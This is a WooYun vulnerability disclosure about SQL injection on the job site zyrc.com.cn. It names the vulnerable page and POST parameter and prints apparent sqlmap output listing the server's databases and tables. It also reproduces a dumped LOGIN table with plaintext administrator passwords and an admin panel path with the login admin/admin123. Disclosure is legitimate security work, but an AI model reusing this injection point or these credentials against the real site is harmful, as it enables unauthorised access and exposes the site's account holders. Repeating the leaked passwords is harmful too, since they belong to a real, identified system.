当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047927

漏洞标题:中原人才网SQL注入至大量信息泄漏

相关厂商:中原人才网

漏洞作者: RedFree

提交时间:2014-01-10 12:17

修复时间:2014-02-24 12:17

公开时间:2014-02-24 12:17

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中原人才网部分页面参数未加过虑导致SQL注入,数据库中信息侧漏。

详细说明:

存在问题的页面:http://www.zyrc.com.cn/per/per_condi_list.asp
Post数据:qfind=2&gwxh=%CF%FA%CA%DB%BE%AD%C0%ED&Submit2=%B2%E9+%D1%AF
其中参数gwxh存在注入。
所有库:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] rcjx
[*] tempdb
[*] test
[*] xbrc


当前库:

current database:    'xbrc'


当前用户:

current user:    'rc'


当前库中所有表:

Database: xbrc
[133 tables]
+----------------------+
| ACT_FEE_TYPE         |
| BBS_DETAIL           |
| BBS_TITLE            |
| CLASS_COURSE_TEST    |
| CLASS_COURSE_TEST    |
| CLASS_INFO           |
| COURSE               |
| DW_FEE_TYPE          |
| DW_FEE_TYPE          |
| DW_MSG               |
| EDU_GRADE            |
| EMAILGRP             |
| FEE_DW               |
| FEE_DW               |
| FEE_YB               |
| GJZW                 |
| HMC                  |
| JLHC                 |
| JLH_DW               |
| JLH_DW               |
| JLH_PARTICIPANT      |
| JLH_TW               |
| LOGIN                |
| MaxId                |
| PAGE_SUBPAGE         |
| PAGE_SUBPAGE         |
| PAGE_TYPE            |
| PAICHUSUO            |
| PER_MSG              |
| PSN_TEST             |
| QUESTION_TYPE        |
| QUESTION_TYPE        |
| RY2                  |
| RY2                  |
| STALL                |
| SUBPAGE_QUESTION     |
| SUBPAGE_QUESTION     |
| TECHER_COURSE        |
| TECHER_INFO          |
| TECHPRO              |
| TITLE                |
| ZS_TYPE              |
| ZS_TYPE              |
| a01                  |
| a02                  |
| a03                  |
| bdbzb                |
| bys                  |
| condition_my         |
| condition_my         |
| da_brs               |
| daima                |
| dalei                |
| dqzd                 |
| dtproperties         |
| dwb                  |
| dwhy                 |
| dwxz                 |
| foreign_lan          |
| forum                |
| groupby1             |
| gzfs                 |
| hybzzd               |
| hyzkzd               |
| jkdmb                |
| jlhryb               |
| jlhxqk               |
| jlhzd                |
| jsslcdzd             |
| jszc                 |
| jszzzd               |
| jyqktjb              |
| jyqxzd               |
| link1                |
| link_old             |
| link_old             |
| lsb                  |
| member               |
| minzu                |
| mzzd                 |
| nxfzd                |
| pbcatcol             |
| pbcatedt             |
| pbcatfmt             |
| pbcattbl             |
| pbcatvld             |
| pylbb                |
| registermember       |
| research             |
| rsdlbzzd             |
| rytjzy               |
| schoolmates          |
| selectInfo           |
| shop_user1           |
| shop_user1           |
| sp                   |
| sypqb                |
| sysconstraints       |
| sysjtjb              |
| syssegments          |
| syxqk                |
| t1                   |
| t2                   |
| t3                   |
| task                 |
| tempparm             |
| tempparm             |
| tjb22                |
| tjbcj                |
| trcolcom             |
| tt                   |
| tw_temp              |
| view_Interface       |
| view_condition_tj_zy |
| view_condition_tj_zy |
| view_group_xlsc      |
| view_ry2             |
| view_ry_tj_zy        |
| view_ry_tj_zy        |
| view_ry_tj_zy        |
| view_will_all        |
| view_will_all        |
| view_zw              |
| will                 |
| wjsp                 |
| wyspzd               |
| xiaolei              |
| xinwen               |
| xw                   |
| xzzw                 |
| zw                   |
| zy                   |
| zzmm                 |
+----------------------+


表LOGIN中数据:

Table: LOGIN
[6 entries]
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+
| xh      | xm              | BH      | BZ      | PWD            | TYPE   | LOGIN          | regdate            |
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+
| <blank> | admin_shichang1 | <blank> | <blank> | 2012_shichang1 | mng    | admin_shichang | 01  9 2007  9:43AM |
| <blank> | admin_zyrc1     | <blank> | <blank> | 2012_admin1    | mng    | admin_zyrc     | 01  9 2007  9:41AM |
| <blank> | dwmng           | <blank> | <blank> | 2012_dwmng     | dwmng  | dwmng          | 06 16 2011 11:00AM |
| <blank> | per_shi         | <blank> | <blank> | 65956852       | permng | per_shi        | 12 23 2013  3:49PM |
| <blank> | permng          | <blank> | <blank> | 2012_permng    | permng | permng         | 05 10 2006  8:33AM |
| <blank> | zyrc_dw         | <blank> | <blank> | 2012_zyrc_dw   | dwmng  | zyrc_dw        | 01  9 2007  9:50AM |
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+


猜到某后台路径:
http://www.zyrc.com.cn/dyzc/manager/index.asp
用户名:admin 密码:admin123

1.jpg


漏洞证明:

Database: xbrc
Table: dqzd
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| dqdm   | varchar |
| dqmc   | varchar |
+--------+---------+
Database: xbrc
Table: t3
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| dw      | varchar |
| job_num | int     |
| xh      | char    |
+---------+---------+
Database: xbrc
Table: FEE_YB
[10 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| BASE_MONEY | int      |
| BH         | varchar  |
| DW_RATION  | numeric  |
| FEE_TIME   | datetime |
| ID         | int      |
| MON_BASE   | int      |
| PSN_MONEY  | int      |
| PSN_RATION | numeric  |
| TIME1      | datetime |
| TIME2      | datetime |
+------------+----------+
Database: xbrc
Table: PAGE_TYPE
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| ID     | int     |
| NAME   | varchar |
| XH     | varchar |
+--------+---------+
Database: xbrc
Table: PSN_TEST
[6 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| BH        | varchar  |
| COMT      | varchar  |
| MARK      | int      |
| NOTE      | varchar  |
| PAGE_NO   | int      |
| TEST_DATE | datetime |
+-----------+----------+
……
………………
……………………


1.jpg

修复方案:

过滤参数。
改后台默认路径。

版权声明:转载请注明来源 RedFree@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝